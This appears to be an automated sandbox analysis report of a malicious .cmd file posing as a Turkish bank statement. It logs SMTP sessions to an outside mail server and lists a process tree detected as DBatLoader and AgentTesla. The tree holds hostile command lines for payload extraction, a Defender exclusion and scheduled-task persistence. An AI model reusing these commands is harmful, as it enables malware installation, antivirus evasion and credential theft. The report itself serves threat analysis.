                                                                                                                  Nov 12, 2024 15:30:47.739839077 CET5875078851.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:30:47 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:30:47.740137100 CET50788587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:30:47.979327917 CET5875078851.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:30:47.981784105 CET50788587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:30:48.222302914 CET5875078851.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:31:21.307816982 CET5875078951.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:21 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:31:21.307976961 CET50789587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:31:21.929394960 CET5875078951.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:31:21.929689884 CET50789587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:31:21.931193113 CET5875078951.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:31:22.169411898 CET5875078951.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:31:44.777314901 CET5875079051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:44 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:31:44.777448893 CET50790587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:31:45.020701885 CET5875079051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:31:45.020874023 CET50790587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:31:45.262257099 CET5875079051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:31:54.787647963 CET5875079151.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:54 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:31:54.787826061 CET50791587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:31:55.028908014 CET5875079151.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:31:55.029056072 CET50791587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:31:55.271213055 CET5875079151.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:31:57.739741087 CET5875079251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:31:57 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:31:57.742537022 CET50792587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:31:57.986536026 CET5875079251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:31:57.987906933 CET50792587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:31:58.232315063 CET5875079251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:32:03.964684010 CET5875079351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:32:03 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:32:03.966089010 CET50793587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:32:04.204843998 CET5875079351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:32:04.205902100 CET50793587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:32:04.443124056 CET5875079351.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:32:10.910260916 CET5875079451.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:32:10 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:32:10.955463886 CET50794587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:32:11.198405981 CET5875079451.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:32:11.455918074 CET50794587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:32:11.699691057 CET5875079451.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                  Nov 12, 2024 15:32:20.813045025 CET5875079551.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 12 Nov 2024 14:32:20 +0000
                                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                  220 and/or bulk e-mail.
                                                                                                                  Nov 12, 2024 15:32:20.813236952 CET50795587192.168.2.551.195.88.199EHLO 536720
                                                                                                                  Nov 12, 2024 15:32:21.055373907 CET5875079551.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 536720 [173.254.250.68]
                                                                                                                  250-SIZE 52428800
                                                                                                                  250-8BITMIME
                                                                                                                  250-PIPELINING
                                                                                                                  250-PIPECONNECT
                                                                                                                  250-STARTTLS
                                                                                                                  250 HELP
                                                                                                                  Nov 12, 2024 15:32:21.055490971 CET50795587192.168.2.551.195.88.199STARTTLS
                                                                                                                  Nov 12, 2024 15:32:21.317868948 CET5875079551.195.88.199192.168.2.5220 TLS go ahead

                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:09:28:07
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "
                                                                                                                  Imagebase:0x7ff72de00000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:09:28:07
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:09:28:07
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\extrac32.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                  Imagebase:0x7ff640820000
                                                                                                                  File size:35'328 bytes
                                                                                                                  MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:09:28:08
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'081'856 bytes
                                                                                                                  MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:28:12
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:09:28:13
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:7
                                                                                                                  Start time:09:28:13
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                  Imagebase:0xfe0000
                                                                                                                  File size:352'768 bytes
                                                                                                                  MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:8
                                                                                                                  Start time:09:28:14
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                  Imagebase:0xfe0000
                                                                                                                  File size:352'768 bytes
                                                                                                                  MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:9
                                                                                                                  Start time:09:28:14
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:352'768 bytes
                                                                                                                  MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:09:28:14
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:11
                                                                                                                  Start time:09:28:15
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:68'096 bytes
                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:09:28:15
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                  Imagebase:0x6d0000
                                                                                                                  File size:250'368 bytes
                                                                                                                  MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 88%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:09:28:15
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                  Imagebase:0xd70000
                                                                                                                  File size:231'936 bytes
                                                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 66%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:09:28:18
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                  Imagebase:0xc10000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:09:28:18
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:16
                                                                                                                  Start time:09:28:18
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f
                                                                                                                  Imagebase:0xde0000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:09:28:18
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:09:28:19
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                  Imagebase:0x750000
                                                                                                                  File size:231'936 bytes
                                                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 66%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Target ID:19
                                                                                                                  Start time:09:28:19
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd""
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:20
                                                                                                                  Start time:09:28:19
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:09:28:20
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:timeout 6
                                                                                                                  Imagebase:0x900000
                                                                                                                  File size:25'088 bytes
                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:09:28:21
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                  Imagebase:0xb70000
                                                                                                                  File size:231'936 bytes
                                                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:09:28:22
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff6ef0c0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:25
                                                                                                                  Start time:09:28:25
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'081'856 bytes
                                                                                                                  MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:09:28:27
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:68'096 bytes
                                                                                                                  MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:09:28:27
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                  Imagebase:0x530000
                                                                                                                  File size:250'368 bytes
                                                                                                                  MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:true

                                                                                                                  Target ID:28
                                                                                                                  Start time:09:28:28
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                  Imagebase:0x6f0000
                                                                                                                  File size:231'936 bytes
                                                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:29
                                                                                                                  Start time:09:28:33
                                                                                                                  Start date:12/11/2024
                                                                                                                  Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:1'081'856 bytes
                                                                                                                  MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
